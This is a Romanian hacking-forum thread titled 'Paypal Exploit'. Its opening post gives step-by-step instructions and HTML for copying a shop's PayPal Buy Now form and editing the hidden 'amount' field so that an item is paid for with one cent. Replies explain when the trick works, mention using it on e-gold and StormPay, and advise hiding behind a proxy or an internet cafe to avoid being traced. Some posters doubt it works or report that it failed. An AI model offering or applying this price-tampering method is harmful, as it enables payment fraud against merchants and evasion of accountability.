Paypal Exploit

[virusz]

Un exemplu usor..

Sa zicem ca vretzi sa cumparati ceva de pe www.site.com

aceasta pagina foloseste butonul paypal.. Sa zicem ca va costa 40 dolari.

<form method="post" action="http://www.site.com/process.php">

<input type="hidden" name="amount" value="4.00">

<input type="hidden" name="item_name" value="$4.00 Item">

<input type="hidden" name="item_number" value="1">

<input type="hidden" name="no_note" value="1">

<input type="hidden" name="currency_code" value="USD">

<input type="hidden" name="no_shipping" value="1">

<input type="hidden" name="quantity" value="1">

<input type="hidden" name="bn" value="PP-BuyNowBF">

<input type="hidden" name="cmd" value="_xclick">

<input type="image" src="http://www.paypal.com/en_US/i/btn/x-click-but01.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">

</form>

O sa gasesti asta in sursa.

Acum trebuie sa

copiezi asta, o pui intr-un nou html si il editezi:

<form method="post" action="http://www.site.com/process.php">

<input type="hidden" name="amount" value="00.01">

<input type="hidden" name="item_name" value="$4.00 Item">

<input type="hidden" name="item_number" value="1">

<input type="hidden" name="no_note" value="1">

<input type="hidden" name="currency_code" value="USD">

<input type="hidden" name="no_shipping" value="1">

<input type="hidden" name="quantity" value="1">

<input type="hidden" name="bn" value="PP-BuyNowBF">

<input type="hidden" name="cmd" value="_xclick">

<input type="image" src="http://www.paypal.com/en_US/i/btn/x-click-but01.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">

</form>

Am editat:

<input type="hidden" name="amount" value="00.01">

Acum apasa butonul, costul v-a fi 1 penny. AI FACUT TREABA

- bafta -

grija.....

[mario23]

adica trebuie sa hackuiesti situl respectiv si sa modifici pagina de pe site? fii si tu mai explicit te rog frumos.

[crystygye]

misto faza.dar exista o chestie prin care sa coste 0 ?

[sym]

hm ... m-as mira daca ar functiona cu adevarat ... nu prea cred ca plata in paypal se bazeaza pe un simplu cod HTML ... :@ in felul asta mi`as cumpara masini de pe e-bay cu un penny folosind paypal ...

[RaiusAngel]

e testat si merge?

[eddie47]

<div class='quotetop'>QUOTE("Shocker")</div>

<div class='quotetop'>QUOTE("sym")

in felul asta mi`as cumpara masini de pe e-bay cu un penny folosind paypal ...

... si ti-ai petrece urmatorii ani intr-o camera 4x3, cu frica permanenta sa nu iti scape sapunul pe jos.[/quote:bd4af9c6cd]

:@ :@:@:@:@:@:@:@:@:@:@:@:@:@:@:@

[sym]

Shocker, nu e chiar cum crezi tu ... am mai facut vizite ocazionale prin astfel de locuri, si niciodata nu am scapat sapunul nu cred ca avea vreunu curaj sa se dea la mine, chiar daca il scapam

[eddie47]

:@

[B_Real]

nu cred, ca merge de fat nu cred ca are cum sa mearga )))))))))))

[robert]

interesant ... is curios dak merge oricum e buna ideea

[phantomas]

<div class='quotetop'>QUOTE("Shocker")</div>

<div class='quotetop'>QUOTE("sym")

in felul asta mi`as cumpara masini de pe e-bay cu un penny folosind paypal ...

... si ti-ai petrece urmatorii ani intr-o camera 4x3, cu frica permanenta sa nu iti scape sapunul pe jos.[/quote:1a2db71abe]

de cat timp sunt pe forum aici am invatat o chestie "inainte sa faci vreo prostie foloseste proxy sau Hide IP" ajuta mult

[eddie47]

Sau te duci la net cafe :@ :@

[RapGame]

chestia asta merge cu o conditie.. daca lasa el acel buton uncrypted.. are optiune cand il creaza sa-l faca criptat sau nu

[Guest]

A sa uitam de cryptarea si cheya folosita daca are asa ceva poti sa vezi ceva de genu in cod aksdjbho(i&Z)*&ZG)*&>gzO8^>zf976fdz976f>ZO968SFOA8YUDFASUDY si nai ce schimba da faza e ca vei plati 1 cent dar probabil administratorul sitului te va prinde si iti va suspenda contu la siturile cat de cat respecatabile se verifica manual paymentu.....asa ca next method si asta merge si la e-gold si la stormpay(daca mai exista) asta faceam pe la inceputuri oricum e harziu rau

[RapGame]

e-gold nu tine encriptat din cate am vazut dar tot la fel majoritatea site-urileor fac verificarea manuala.. asa ca te-ai tras pe pula singur cat despre stormpay never trust it... never used it

[DarkWizzard]

A incercat cineva ?

[RapGame]

pe ce sa incerce? paypal.. da merge aia pt cei care nu au criptat acel buton si la care se activeaza ceva automat adica dupa ce platesti te redirectioneaza pe o pagina care-ti activeaza useru sau depinde la ce folosesti .. in cazul e-gold ma indoiesc sa mearga

[mo59]

Exploit-u` asta e copiat! Si nici nu cred ca mere, oricum, in Romania cica nu exista PayPal...sau poate exista? :@

[virusz]

mo59, o treaba sa stii: postul meu cu acest exploit copiat e mai bun decat postul tau care nu are nici un sens, eu l-am vazut undeva, am tradus textu' si l-am pus aici....

inainte sa iti dai cu parerea, informeazate!!! ...noroc oricum...

[mo59]

scuze virusz am crezut ca se acorda credite pe aici, scuza-ma daca te-am jignit :@

P.S. : am incercat si eu asta si nu mere

[virusz]

ai crezut bine, locul de unde l-am luat nu are nevoie de asa ceva, ba nu mai comenta tu, pune-l pe ala care vrea credit sa vb tu nu vb ca nu stii nimic!

P.S. :mai incearca..

[mo59]

virusz daca vrei o rezolvam prin pm , ca aici consumam timpul degeaba si intram in off-topic.

P.S.: regula nr 5 zice sa acorzi credite...

[virusz]

ma dhiuri ce sa rezolvam? ..nu avem ce, si in pm ne pierdem timpul... off-topic e deja, cui sa acord credit pt acest expl? -mai bine taci ca ai 6 posturi din care 6 nu sunt deloc folositoare.... hai.

[mo59]

h4cky0u.org asta e creditul .. aa.. si vezi cum vorbesti, ca eu nu te-am jignit.

[virusz]

lolz, stai flexat ca nu de acolo l-am si iti mai spun ca nu de acolo a plecat acest exploit... in fine.. hai ca nu am vrut sa te supar dar esti enervant, nu faci nimic bun...numa sa comentezi stii, dak aveai si tu posturi folositoare poate nu te luam asa dar nu ai deocamdata. si ti-am spus hai.